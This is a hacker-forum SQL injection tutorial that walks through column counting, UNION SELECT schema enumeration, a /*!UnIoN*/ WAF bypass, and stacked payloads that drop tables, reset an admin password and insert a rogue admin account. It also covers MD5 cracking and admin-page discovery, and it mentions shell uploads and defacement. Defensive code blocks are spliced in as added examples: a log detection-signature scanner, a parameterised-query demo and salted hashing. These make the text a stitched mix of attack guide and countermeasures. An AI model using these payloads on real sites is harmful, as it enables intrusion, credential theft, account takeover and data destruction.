SQL Injection Tutorial: All common SQL injection problems and Solutions



These days I'll write a guide for you that covers most of the problems you run into while doing SQL injection and the solutions to them. Probably everyone who has looked for tutorials on how to hack a website has noticed that there are too many SQL tutorials. Almost every forum has 10 tutorials and every blog 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author probably doesn't even know why SQL injection works. All of those tutorials are like guides that stop at the ABCs, and the result is just a mess. Everyone is writing tutorials about SQL, but nobody covers the problems that come with that attack.

What is the cause of most problems related to SQL injection?

Web developers aren't always that stupid; they have also heard of hackers and have applied some security measures like a WAF or manual protection. A WAF is a Web application firewall and will block all malicious requests, but WAFs are quite easy to bypass. Nobody wants to have their website hacked, so they apply some protection too, but of course it would be wrong to say that if we fail then it's the web server's fault. There's also a big chance that we're injecting differently than we should.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested in WAFs and how they work then I recommend reading about them on Wikipedia: http://en.wikipedia.org/wiki/Application_firewall


ORDER BY is being blocked?

It rarely happens, but sometimes you can't use ORDER BY because the WAF has blocked it or for some other reason. Unfortunately we can't skip the ORDER BY step and we have to find another way. The way is simple: instead of using ORDER BY we have to use GROUP BY, because that's very unlikely to be blacklisted by the WAF.

If this request comes back 'forbidden' then it means it's blocked:
http://site.com/gallery?id=1 order by 100--
Then you have to try GROUP BY and it will return correctly:
http://site.com/gallery?id=1 group by 100-- / success
There's still a possibility that the WAF will block the request, but there's one other way too, and it's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably receive an error like this: Operand should contain 5 column(s).

That error means there are 5 columns and we can continue to our next step, which is UNION SELECT. The command was different from the usual one, but the rest of the injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still no error?

That's a little section where I'll tell you why sometimes ORDER BY won't work and you don't see an error. The difference between this chapter and the last one is that previously your requests were blocked by the WAF, but here the injection method is just a little bit different. When I first saw that on my own I thought: how does a database have 100000 columns, because I'm not getting the error while the website is vulnerable?

The answer is quite logical. By trying ORDER BY 1000000 we're not missing the error because there are that many columns in there; we're not getting the error because our injection isn't working.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
To bypass this you just have to change the URL a little bit: add ' after the ID number and at the end add +

Example : 
site.com/news.php?id=9' order by 10000000--+[Error]
If the last example works for you then it means you have to use it in the next steps also. There isn't anything complicated, but to make everything clear I'll still give an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Getting data from other databases.

Sometimes we can inject successfully and no error appears; it's just like a hacker's dream. That dream will end when we see that there isn't anything useful to us. There are only a few tables and they're called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still, we know that the server probably has several databases, and even if we have found the data we're looking for, you should still take a look in the other databases also.

This gives you the schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this query you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This query will give you the column names (column names come from information_schema.columns, not information_schema.tables).
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=0x and table_name=0x

I get an error if I try to extract tables.

site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL to this:
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name))),4 from information_schema.tables limit 0,1--


How to bypass WAF/Web application firewall

The biggest reason why most of these errors appear is the security measures added to the server, and a WAF is the biggest one, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the quote below; this is the WAF. Most people who're into SQL injection and bypassing WAFs are probably thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAFs is a different kind of science and I could write an ebook on bypassing them. I'll keep all those bypassing queries for another time and won't cover them this time.

"404 forbidden you do not have permission to access to this webpage"

The request will look like this if you get the error:
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]

Change the URL like it's below:
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
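The request above slips past a WAF that matches keywords on the raw text, because MySQL executes what is inside a /*!...*/ version comment while the filter only sees "/*!UnIoN*/". As an added example for the defensive side (not code from this tutorial), here is a small Python normaliser that decodes and unwraps such comments before matching, run over constructed access-log lines that echo the requests shown on this page:

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the inside of a /*!...*/ version comment, so a WAF that matches
# keywords on the raw request text sees "/*!UnIoN*/" and never sees UNION.
# Decoding and stripping the comment wrappers before matching closes that gap.
VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

def normalize(uri):
    """Decode %xx and '+', unwrap /*!...*/, drop /*...*/, squeeze spaces, lowercase."""
    text = unquote_plus(uri)
    text = VERSION_COMMENT.sub(r" \1 ", text)   # keep the keyword MySQL would run
    text = PLAIN_COMMENT.sub(" ", text)         # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).lower()

# Signatures for the probes used in this tutorial, applied to the normalised text.
PATTERNS = [
    ("union select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("order/group by probe", re.compile(r"\b(?:order|group)\s+by\s+\d+")),
    ("schema enumeration", re.compile(r"\binformation_schema\.\w+")),
    ("stacked statement", re.compile(r";\s*(?:drop|update|insert)\b")),
    ("subquery column count", re.compile(r"\)\s*=\s*\(\s*select\b")),
]

def classify(uri):
    """Names of every signature that matches the normalised request, in list order."""
    text = normalize(uri)
    return [name for name, rx in PATTERNS if rx.search(text)]

def scan_log(lines):
    """(request_path, hits) for each access-log line whose request matches a signature."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if m and (found := classify(m.group(1))):
            hits.append((m.group(1), found))
    return hits

# Constructed access-log lines echoing the requests shown in this tutorial.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 +0000] "GET /gallery?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2012:13:55:40 +0000] "GET /gallery?id=1%20group%20by%20100-- HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/Oct/2012:13:55:44 +0000] "GET /index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5-- HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2012:13:55:50 +0000] "GET /news.php?id=8%20and%20(select%20*%20from%20admins)=(select%201) HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for path, found in scan_log(SAMPLE_LOG):
        print(path, "->", ", ".join(found))
```

This signature list is a detection aid for log review, not a complete rule set; the fix for the injection itself is parameterised queries in the application.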

Is it possible to modify the data in the database by SQL injection?

Most people aren't aware of it, but it's possible. You're able to UPDATE, DROP, INSERT and SELECT data. Most people who are working with SQL injection have never looked further into the attack than what's shown in the common SQL injection tutorial, and a typical SQL injection tutorial doesn't have those statements included. Most likely because most people are copy-pasting tutorials or just rewriting them. You might ask why one should update, drop or insert data into the database if I can just look into the data and use the existing ones; why should we create another Admin account if one already exists?

Reading the data is just one side of the injection, and sometimes those other commands, which are quite notorious, are more powerful than we thought. If you have read all those available SQL injection tutorials then you're probably aware that you can read the data, but you didn't realize you're able to modify it. If you have tried SQL injection then you have probably run into problems like: there isn't an admin account, so why not use the INSERT command to add one? There isn't an admin page to log in to, so why not go to the table and drop all the data so nobody could access it? I want to get rid of the current Admin and can't change his password, so why not use the UPDATE command to change the Administrator's password?

You have probably noticed that I have talked a lot about unnecessary things that you probably don't need to know, but that's information you need to understand to become a real hacker, because you have to understand how SQL databases work to figure out how those commands work, and you can't find tutorials about it on the net. It's just like the math you learn in school: if you don't understand it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to practice.

http://site.com/news.php?id=1


You have to start injecting to look at the tables and the columns in them, but let's assume that the current table is named "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT data in the database. SELECT is probably already covered in all the tutorials, so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it? 

http://site.com/news.php?id=1; DROP TABLE news

That seems easy; we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain because you can all understand the above command. Unfortunately most of the 'hackers' who're making tutorials on SQL injection aren't aware of it, and sometimes those three words are more important than all the information we can read in some tutorials.

Let's head to the next statement, which is UPDATE. 
http://site.com/news.php?id=1; UPDATE `Table name` SET `data you want to edit` = 'new data' WHERE column_name='information'--

The above explanation might be quite confusing, so I'll add a query that you're most likely going to use in real life : 

http://site.com/news.php?id=1; UPDATE `admin_login` SET `password` = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated the Administrator account's password. In the above example we updated the table called 'admin_login' and set a password which is "Crackhackforum", and those credentials belong to the account whose username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't as easy as the "DROP" statement is, but it's still quite understandable. Let's go further with Administrator privileges because that's what most people are heading for. Adding an administrator account would be like this : 
http://site.com/news.php?id=1; INSERT INTO `admin_login` (`login_id`, `login_name`, `password`, `details`) VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO `admin_login` means that we're inserting something into `admin_login`. Now we have to tell the database what actual information we want to add: (`login_id`, `login_name`, `password`, `details`) means that the fields we're adding to the DB are login_id, login_name, password and details, and those are the details the database needs to create a new account. So far we have told the database what information we want to add: we want to add a new account, a password for it, an account ID and details. Now we have to tell the database what the new account's login name, password and account ID will be: VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means the account ID is 2, the login name will be Rynaldo and the password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is open the Admin page and log in. 
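All three statements above only run because the id parameter is pasted straight into the SQL text. As an added example (not code from this tutorial), the Python script below builds a throwaway SQLite database with constructed sample rows and runs the parameter both the vulnerable way (concatenation, which is what lets "; DROP TABLE news" and the trailing "--" do their work) and the fixed way (a bound parameter, which the driver never parses as SQL):

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for a site with a 'news' table (sample data only)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
    """)
    return db

def table_exists(db, name):
    row = db.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                     (name,)).fetchone()
    return row is not None

def fetch_news_vulnerable(db, raw_id):
    """news.php?id= style: the raw parameter becomes part of the SQL text.
    A value like "1 OR 1=1 -- anything" rewrites the WHERE clause, and the
    '--' turns the rest of the line into a comment the engine ignores."""
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in db.execute(sql)]

def run_vulnerable_stacked(db, raw_id):
    """Same concatenation, but through executescript(), which runs every statement
    in the string; that is the driver behaviour the '; DROP TABLE news' payload
    depends on (sqlite3's execute() refuses a second statement)."""
    db.executescript("SELECT title FROM news WHERE id=" + raw_id)

def fetch_news_safe(db, raw_id):
    """Parameterised form: raw_id is bound as one value, so 'OR 1=1', '--' and ';'
    are compared as literal text and never parsed as SQL."""
    return [row[0] for row in
            db.execute("SELECT title FROM news WHERE id=?", (raw_id,))]

if __name__ == "__main__":
    db = make_db()
    print(fetch_news_vulnerable(db, "1 OR 1=1 -- ignored"))   # both rows
    print(fetch_news_safe(db, "1 OR 1=1 -- ignored"))         # []
    run_vulnerable_stacked(db, "1; DROP TABLE news")
    print(table_exists(db, "news"))                          # False
```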

Passwords aren't working

Sometimes the website is vulnerable to SQL injection and you can get the passwords. Then you get the site's credentials, but when you enter them into the admin panel it shows "Wrong password". This can be because those passwords are there, but aren't working. This is done by the website's administrator to confuse you, and actually the panel doesn't contain any username/password. Sometimes the accounts are deleted, but the records are still in the database. Sometimes it isn't done by the administrator and those credentials have just been left in the database after removing the login page; sometimes the real credentials have been moved to another database and the old records haven't been deleted.

Sometimes I get some strange password

This strange password is called a hash and most likely it's an MD5 hash. That means the site's administrator has added more security to the page and has hashed the passwords. The most popular way is using MD5. The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com . I don't like to be a person who's throwing around little details that aren't relevant, but here's a tip you should keep in mind. The site says it's an "md5decryptor", which refers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they have 'one-way' encryption. One-way encryption means it can only be encrypted, but not decrypted. Still, it doesn't mean that we can't know what the hash means; we have to crack it. Hashes can't be decrypted, only cracked. Those sites aren't cracking hashes every time; they're saving already cracked hashes & results in their database, and if you ask for a hash that's already in their database you will get the result. :)

An MD5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all the hashes that exist and their details here: http://pastebin.com/aiyxhQsf
MD5 hashes can't be decrypted, only cracked
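The point above, that lookup sites answer from a table of already-computed digests rather than decrypting anything, and what stops that on the defending side, as an added Python example (not from this tutorial). The wordlist is constructed, and the PBKDF2 iteration count is an assumed value for the example:

```python
import hashlib
import hmac
import os

# Constructed mini wordlist; the lookup sites mentioned above do the same thing at
# scale, storing already-computed MD5 digests and answering by lookup, not decryption.
WORDLIST = ["password", "12345", "letmein", "qwerty", "Crackhackforum"]

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def build_lookup(words):
    """Map md5(word) -> word, computed once up front."""
    return {md5_hex(w): w for w in words}

def lookup(table, digest):
    """Nothing is decrypted: the digest is either already in the table or it is not."""
    return table.get(digest.lower())

ROUNDS = 200_000  # PBKDF2 iteration count; assumed value for this example

def hash_password(password, salt=None):
    """Defensive side: per-user random salt plus a slow KDF (PBKDF2-HMAC-SHA256).
    The same password with a different salt gives a different digest, so one
    precomputed table cannot cover every user, and each guess costs ROUNDS iterations."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)

if __name__ == "__main__":
    table = build_lookup(WORDLIST)
    print(lookup(table, "827ccb0eea8a706c4c34a16891f84e7b"))  # 12345, as in the tutorial
    stored = hash_password("12345")
    print(lookup(table, stored.split("$")[1]))                  # None
    print(verify_password("12345", stored))                     # True
```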

How to find the admin page of a site?


Some sites don't contain an admin panel, so you can use any means for finding the admin page, but it simply doesn't exist. You might ask "I got data from the database, why isn't there any admin login page then?", but sometimes the records are just left in the database after removing the panel.

Mostly people are using tools called "Admin page finders". They have a specific list of pages and will try them. If the website gives HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist. If a page from the list exists then the tool will say "Page found". I don't have any tool to share at the moment, but if you're downloading one yourself then be careful because many of those tools are infected with viruses.

Mostly the tools I described above, admin page finders, don't find the admin page if it's custom made or renamed. That means quite often those tools don't help us out and we have to use an alternative, and I think the best one is using website crawlers. Most of you probably have Acunetix Web Vulnerability Scanner 8 and it has one amazing feature called site crawler. It'll show you all the pages on the website and will 100% find the login page if there is one on the website.


Automated SQL injection tools.

Automated SQL injection tools are programs that will do the whole job for you; sometimes they will even crack the hashes and find the Admin page for you. Most people are using automated SQL injection tools and the most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap, no matter that the other tool is much better for that injection. The sad fact why that's so is that many people aren't even able to run SQLmap, and those people are called script-kiddies. Being a script-kiddie is the worst thing you can be in the hacking world, and if you don't understand how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most people will think that you're a script-kiddie, because most likely you are. Professionals won't take you seriously if you're injecting with them and you won't become a real hacker either. My text above might raise a question, "But I've seen that even professional hackers are using SQLmap?", and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in a table then it would just take ages to process all that information. I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to understand how to do it manually, and that's what the tutorial above is teaching you.

Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides getting data?

There are many things besides getting data from the database, and sometimes they are much more powerful. We have discussed above that sometimes the database doesn't contain the Administrator's credentials or you can't crack the hashes. Then the whole injection seems useless because we can't use the data we got from the database. Still, we can use a few other techniques. Just like we can perform a CSRF attack with persistent XSS, we can also move on to other attacks through SQL injection. One of the options would be doing a DOS attack on the page that is vulnerable to SQL injection. DOS is short for Denial of Service and it's totally different from DDOS, which is Distributed Denial of Service. I think that you all probably know what these are, but if I sum that attack up in a sentence then DOS will allow us to take down the page temporarily so users wouldn't have access to the website. The other way would be uploading our shell through SQL injection. If you're asking what a shell is, then to put it briefly, it's a program that we upload to the server; it will create an entry for us and will give us all the privileges to do what we'd like on the server, and sometimes by uploading a shell you have more privileges to change things than the actual Admin has. After you have uploaded a shell you can move on to symlinking, which means we can deface all the sites that are sharing the same server. Shelling the page is probably the most powerful thing you can use on the page. I haven't covered how to upload a shell through SQL injection and haven't covered how to cause DOS either, but probably will in my next tutorials, because uploading a shell through SQL is another kind of science, just like bypassing WAFs. 
Those are the most common things that attackers will put to use after they can't get anything useful out of the database. Of course every page doesn't have the same vulnerabilities and they don't always respond like we want, and by that I mean we can't perform those attacks on all sites. We have all heard that imagination is endless and you can do whatever you'd like. That's kind of true and hacking isn't an exception; there are more methods than I can count. 

What to do if all the data doesn't show on the page?
I have really rarely seen that there is so much data on the web page that it all just doesn't fit in there, but one person recently asked me that question and I decided to add it here. Also if you're having questions then definitely ask and I'll update the article. If we get back to the question then the answer is easy: if all the data can't fit on the screen then you have to look at the source code, because everything shown on the web page will be in there. Also sometimes data will appear in the tab where usually the website's title is. If you can't see the data then sometimes it's hidden, but with a closer look you might find it in the source. That's why you always have to check all the options before quitting, because sometimes you might think "I can't inject into that..", but actually the answer is hidden in the source.

What is the purpose of '--' in union+select+1,2,3,4,5-- ?
I recommend reading about null bytes, and here's a good description of them: http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used. Adding -- to the end of the URL isn't always necessary and it depends on the target. It doesn't have any effect on the injection itself because it doesn't mean anything by itself, but it's still being used because it marks the end of the query. It means that if I'm injecting as http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be read. It's just like when you hide a shell. Sometimes the injection isn't working if -- is missing, because -- tells the DB "I'm the end of the query, don't read anything that comes after me and execute everything in front of me". It's just like writing a sentence without a full stop: people might think it's not the end of your sentence and will wait until you write the other part of the sentence, and the end comes when you add the full stop to your sentence.